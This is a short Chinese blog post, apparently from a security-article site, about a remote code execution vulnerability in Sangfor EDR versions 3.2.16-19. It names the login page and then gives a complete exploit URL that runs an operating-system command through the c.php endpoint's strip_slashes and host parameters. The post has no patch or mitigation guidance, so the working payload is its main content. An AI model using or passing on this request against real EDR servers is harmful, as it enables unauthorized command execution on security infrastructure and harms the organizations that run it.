深信服EDR(v3.2.16-19)远程代码执行漏洞

  • A+
所属分类:安全文章 安全漏洞

漏洞详情

访问一下深信服EDR,显示登陆界面

https://IP:PORT/ui/login.php

深信服EDR(v3.2.16-19)远程代码执行漏洞


此时我们把URL改成如下,即可实现远程代码执行

https://IP:PORT/ui/login.php/tool/log/c.php?strip_slashes=system&host=id

深信服EDR(v3.2.16-19)远程代码执行漏洞


发表评论

:?: :razz: :sad: :evil: :!: :smile: :oops: :grin: :eek: :shock: :???: :cool: :lol: :mad: :twisted: :roll: :wink: :idea: :arrow: :neutral: :cry: :mrgreen: